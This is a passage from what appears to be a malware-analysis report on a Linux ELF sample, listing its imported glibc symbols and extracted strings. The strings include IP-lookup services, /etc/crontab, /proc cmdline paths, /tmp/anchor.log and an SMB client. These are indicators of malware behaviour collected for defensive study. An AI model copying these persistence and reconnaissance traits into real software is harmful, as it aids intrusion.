style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">gettimeofday@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">NOTYPE</td> <td style="text-align: left">WEAK</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">_ITM_addUserCommitAction</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">fputs@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">fnmatch@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">NOTYPE</td> <td style="text-align: left">WEAK</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">_ITM_memcpyRtWn</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">__strtok_r@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">memset@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">geteuid@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">fscanf@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">ioctl@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">getcwd@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">sendto@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">close@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">setsid@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">strspn@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">closedir@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">fputc@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">strcspn@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">memchr@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">read@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">__libc_start_main@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">srand@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">memcmp@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">fgets@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">__tls_get_addr@GLIBC_2.3 (6)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">getsockopt@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">execve@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">calloc@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">strcmp@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">signal@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">syscall@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">feof@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">NOTYPE</td> <td style="text-align: left">WEAK</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left"><strong>gmon_start</strong></td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">umask@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">if_nametoindex@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">strtol@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">memcpy@GLIBC_2.14 (7)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">inet_pton@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">__xpg_basename@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">time@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">fileno@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">inet_aton@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">__xstat@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">readdir@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">random@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">get_current_dir_name@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">pthread_mutex_unlock@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">__rawmemchr@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">malloc@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">fflush@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">__isoc99_sscanf@GLIBC_2.7 (8)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">getifaddrs@GLIBC_2.3 (9)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">__fxstat@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">listen@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">recvfrom@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">getlogin@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">clock_gettime@GLIBC_2.2.5 (10)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">strpbrk@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">fseek@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">realloc@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">fdopen@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">asprintf@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">NOTYPE</td> <td style="text-align: left">WEAK</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">_ITM_RU8</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">freeifaddrs@GLIBC_2.3 (9)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">poll@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">chmod@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">bind@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">readv@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">memmove@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">waitpid@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">atol@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">open@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">access@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">fopen@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">NOTYPE</td> <td style="text-align: left">WEAK</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">_ITM_memcpyRnWt</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">pthread_join@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">jrand48@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">accept@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">getsockname@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">strtoul@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">flock@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">__cxa_atexit@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">strcat@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">gethostname@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">sprintf@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">getppid@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">connect@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">fwrite@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">__fprintf_chk@GLIBC_2.3.4 (4)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">getaddrinfo@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">strdup@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">strerror@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">NOTYPE</td> <td style="text-align: left">WEAK</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">_ZGTtdlPv</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">sleep@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">pthread_mutex_init@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">fork@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">strstr@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">pthread_mutex_lock@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">rand@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">__ctype_tolower_loc@GLIBC_2.3 (9)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">freeaddrinfo@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">OBJECT</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">stderr@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">socket@GLIBC_2.2.5 (2)</td> </tr> </tbody> </table> <h2 id="interesting-strings">Interesting Strings</h2> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/lib64/ld-linux-x86-64.so.2 (UNIX_PATH_REGEX) /run/uui1 (UNIX_PATH_REGEX) dd/reque (UNIX_PATH_REGEX) Invalid address:%s Can not resolv into IPv4/v6. (UNIX_PATH_REGEX) Unknown address family :%d. Only IPv4/IPv6 supported so far. (UNIX_PATH_REGEX) Can not decode info_type/info_class %d/%d yet (UNIX_PATH_REGEX) smb:// (UNIX_PATH_REGEX) URL does not start with 'smb://' (UNIX_PATH_REGEX) Read/Write failed with (0x%08x) %s (UNIX_PATH_REGEX) Can not enccode info_type/info_class %d/%d yet (UNIX_PATH_REGEX) dev/null (UNIX_PATH_REGEX) http://checkip.amazonaws.com (URL_REGEX, UNIX_PATH_REGEX) http://ipecho.net/plain (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX) http://ipinfo.io/ip (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX) http://api.ipify.org (URL_REGEX, UNIX_PATH_REGEX) http://icanhazip.com (URL_REGEX, UNIX_PATH_REGEX) http://myexternalip.com/raw (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX) http://wtfismyip.com/text (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX) http://ip.anysrc.net/plain/clientip (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX) https://checkip.amazonaws.com (URL_REGEX, UNIX_PATH_REGEX) https://ipecho.net/plain (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX) https://ipinfo.io/ip (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX) https://api.ipify.org (URL_REGEX, UNIX_PATH_REGEX) https://icanhazip.com (URL_REGEX, UNIX_PATH_REGEX) https://myexternalip.com/raw (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX) https://wtfismyip.com/text (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX) https://ip.anysrc.net/plain/clientip (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX) 20:06:55 (IPV6_REGEX) 20:06:57 (IPV6_REGEX) 20:06:57 (IPV6_REGEX) 20:06:58 (IPV6_REGEX) MM/dd/yy (UNIX_PATH_REGEX) &lt;assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"&gt;&lt;trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"&gt;&lt;security&gt;&lt;requestedPrivileges&gt;&lt;requestedExecutionLevel level="asInvoker" uiAccess="false"&gt;&lt;/requestedExecutionLevel&gt;&lt;/requestedPrivileges&gt;&lt;/security&gt;&lt;/trustInfo&gt;&lt;application xmlns="urn:schemas-microsoft-com:asm.v3"&gt;&lt;windowsSettings&gt;&lt;dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"&gt;true&lt;/dpiAware&gt;&lt;/windowsSettings&gt;&lt;/application&gt;&lt;/assembly&gt; (URL_REGEX, DOMAIN_REGEX) &gt;/&gt;J&gt;i&gt;{&gt; (UNIX_PATH_REGEX) &gt;*&gt;/&gt;T&gt; (UNIX_PATH_REGEX) /etc/crontab (UNIX_PATH_REGEX) /proc/%s/cmdline (UNIX_PATH_REGEX) /tmp/anchor.log (UNIX_PATH_REGEX) Couldn't read a file:// file (UNIX_PATH_REGEX) URL using bad/illegal format or missing URL (UNIX_PATH_REGEX) Failed writing received data to disk/application (UNIX_PATH_REGEX) Upload failed (at start/before it took off) (UNIX_PATH_REGEX) Failed to open/read local data from file/application (UNIX_PATH_REGEX) Socket not ready for send/recv (UNIX_PATH_REGEX) Stream error in the HTTP/2 framing layer (UNIX_PATH_REGEX) HTTP/1.%d %d (UNIX_PATH_REGEX) CONNECT %s HTTP/%s (UNIX_PATH_REGEX) multipart/mixed (UNIX_PATH_REGEX) application/octet-stream (UNIX_PATH_REGEX) text/plain (UNIX_PATH_REGEX) multipart/form-data (UNIX_PATH_REGEX) image/gif (UNIX_PATH_REGEX) image/jpeg (UNIX_PATH_REGEX) image/png (UNIX_PATH_REGEX) image/svg+xml (UNIX_PATH_REGEX) text/html (UNIX_PATH_REGEX) application/pdf (UNIX_PATH_REGEX) application/xml (UNIX_PATH_REGEX) oversized cookie dropped, name/val %zu + %zu bytes (UNIX_PATH_REGEX) # https://curl.haxx.se/docs/http-cookies.html (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX) Content-Range: bytes 0-%ld/%ld (UNIX_PATH_REGEX) Content-Range: bytes %s%ld/%ld (UNIX_PATH_REGEX) %s HTTP/%s (UNIX_PATH_REGEX) Content-Type: application/x-www-form-urlencoded (UNIX_PATH_REGEX) Received HTTP/0.9 when not allowed (UNIX_PATH_REGEX) Lying server, not serving HTTP/2 (UNIX_PATH_REGEX) HTTP/1.0 proxy connection set to keep alive! (UNIX_PATH_REGEX) HTTP/1.1 proxy connection set close! (UNIX_PATH_REGEX) HTTP/1.0 connection set to keep alive! (UNIX_PATH_REGEX) Forcing HTTP/1.1 for NTLM (UNIX_PATH_REGEX) Content-Range: bytes %s/%ld (UNIX_PATH_REGEX) ftp://%s:%s@%s (UNIX_PATH_REGEX) HTTP/%1d.%1d%c%3d (UNIX_PATH_REGEX) HTTP/2 %d (UNIX_PATH_REGEX) RTSP/%1d.%1d%c%3d (UNIX_PATH_REGEX) %s://%s (UNIX_PATH_REGEX) Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds (UNIX_PATH_REGEX) INFO/REPLY (UNIX_PATH_REGEX) Cannot rewind mime/post data (UNIX_PATH_REGEX) select/poll returned error (UNIX_PATH_REGEX) No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.) (UNIX_PATH_REGEX) select/poll error (UNIX_PATH_REGEX) Content-Type: text/parameters (UNIX_PATH_REGEX) Content-Type: application/sdp (UNIX_PATH_REGEX) Accept: application/sdp (UNIX_PATH_REGEX) %s %s RTSP/1.0 (UNIX_PATH_REGEX) Content-Type: application/dns-message (UNIX_PATH_REGEX) 0123456789abcdefABCDEF::. (IPV6_REGEX) 127.0.0.1/ (IPV4_REGEX) file://%s%s%s (UNIX_PATH_REGEX) %s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s (UNIX_PATH_REGEX) %s/%s@%s (UNIX_PATH_REGEX) failed to resume file:// transfer (UNIX_PATH_REGEX) Bad PASV/EPSV response: %03d (UNIX_PATH_REGEX) OS/400 (UNIX_PATH_REGEX) Doing the SSL/TLS handshake on the data stream (UNIX_PATH_REGEX) FTP response aborted due to select/poll error: %d (UNIX_PATH_REGEX) /var/lib/libuuid/clock.txt (UNIX_PATH_REGEX) /dev/random (UNIX_PATH_REGEX) /dev/urandom (UNIX_PATH_REGEX) not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugsbasic_string::_M_create (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX) std::bad_alloc (IPV6_REGEX) std::bad_cast (IPV6_REGEX) std::bad_typeid (IPV6_REGEX) std::bad_exception (IPV6_REGEX) </code></pre></div></div> <h2 id="osint">OSINT</h2> <ul> <li><a 